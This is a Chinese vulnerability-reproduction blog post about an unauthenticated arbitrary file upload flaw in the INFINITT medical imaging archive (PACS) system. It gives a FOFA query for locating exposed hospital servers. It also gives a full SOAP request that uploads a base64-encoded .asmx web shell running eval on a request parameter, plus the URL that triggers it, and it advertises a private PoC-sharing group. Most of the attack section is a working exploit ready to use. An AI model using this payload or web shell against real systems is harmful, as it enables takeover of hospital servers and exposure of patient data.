当前位置: 首页 > news >正文

【漏洞复现】英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传漏洞

news 来源:原创 2024/9/28 23:12:00

0x01 产品简介

英飞达医学影像存档与通信系统 Picture Archiving and Communicaton System,它是应用在医院影像科室的系统,主要的任务就是把日常产生的各种医学影像(包括核磁,CT,超声,各种X光机,各种红外仪、显微仪等设备产生的图像)通过各种接口(模拟,DICOM,网络)以数字化的方式海量保存起来,当需要的时候在一定的授权下能够很快的调回使用,同时增加一些辅助诊断管理功能。它在各种影像设备间传输数据和组织存储数据具有重要作用。

0x02 漏洞概述

英飞达医学影像存档与通信系统WebJobUpload 接囗任意文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

0x03 搜索语法

FOFA:"INFINITT" && (icon_hash="1474455751" || icon_hash="702238928")

在这里插入图片描述

0x04 漏洞复现

POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"
Connection: close<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>rce.asmx</fileName>
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICB9Cn0=</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

在这里插入图片描述

/1/rce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

在这里插入图片描述

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC获取

请使用VX扫一扫加入内部POC分享圈子
在这里插入图片描述

相关文章:

  • YoloV8改进策略:Neck层改进、注意力改进|HCANet全局与局部的注意力模块CAFM|二次创新|即插即用
  • MySQL中的sql语句
  • bambustudio debian en_GB
  • 独享IP是原生IP吗?二者有何区别?
  • 中国区 AWS 控制台集成 ADFS 登录
  • List Control控件绑定变量
  • React暴露组件的方法给全局作用域调用
  • 【Linux】Linux的安装
  • Gitee的原理及应用详解(一)
  • 医疗科技:UWB模块为智能医疗设备带来的变革
  • Vue3实战笔记(45)—VUE3封装一些echarts常用的组件,附源码
  • 【DZ模板】克米设计APP手机版本地化+完美使用
  • Atlas 200I DK A2安装MindSpore Ascend版本
  • Yolov9调用COCOAPI生成APs,APm,APl
  • 每日OJ题_剑指offer斐波那契数列篇
  • Fabric架构演变之路
  • git 常用命令
  • Java 多线程编程之:notify 和 wait 用法
  • JavaScript 奇技淫巧
  • javascript面向对象之创建对象
  • js ES6 求数组的交集,并集,还有差集
  • Mocha测试初探
  • SpiderData 2019年2月23日 DApp数据排行榜
  • vue-cli3搭建项目
  • zookeeper系列(七)实战分布式命名服务
  • 入手阿里云新服务器的部署NODE
  • 世界上最简单的无等待算法(getAndIncrement)
  • 事件委托的小应用
  • postgresql行列转换函数
  • ​软考-高级-系统架构设计师教程(清华第2版)【第15章 面向服务架构设计理论与实践(P527~554)-思维导图】​
  • ​数据链路层——流量控制可靠传输机制 ​
  • ### RabbitMQ五种工作模式:
  • #我与Java虚拟机的故事#连载12:一本书带我深入Java领域
  • (04)Hive的相关概念——order by 、sort by、distribute by 、cluster by
  • (3)(3.2) MAVLink2数据包签名(安全)
  • (Git) gitignore基础使用
  • (HAL)STM32F103C6T8——软件模拟I2C驱动0.96寸OLED屏幕
  • (创新)基于VMD-CNN-BiLSTM的电力负荷预测—代码+数据
  • (大众金融)SQL server面试题(1)-总销售量最少的3个型号的车及其总销售量
  • (二)Eureka服务搭建,服务注册,服务发现
  • (附源码)python旅游推荐系统 毕业设计 250623
  • (六)软件测试分工
  • (论文阅读31/100)Stacked hourglass networks for human pose estimation
  • (免费领源码)python#django#mysql校园校园宿舍管理系统84831-计算机毕业设计项目选题推荐
  • (转)scrum常见工具列表
  • (转)Spring4.2.5+Hibernate4.3.11+Struts1.3.8集成方案一
  • **《Linux/Unix系统编程手册》读书笔记24章**
  • .config、Kconfig、***_defconfig之间的关系和工作原理
  • .form文件_一篇文章学会文件上传
  • .NET “底层”异步编程模式——异步编程模型(Asynchronous Programming Model,APM)...
  • .net core使用RPC方式进行高效的HTTP服务访问
  • .NET delegate 委托 、 Event 事件
  • .NET 简介:跨平台、开源、高性能的开发平台
  • @configuration注解_2w字长文给你讲透了配置类为什么要添加 @Configuration注解
  • @data注解_SpringBoot 使用WebSocket打造在线聊天室(基于注解)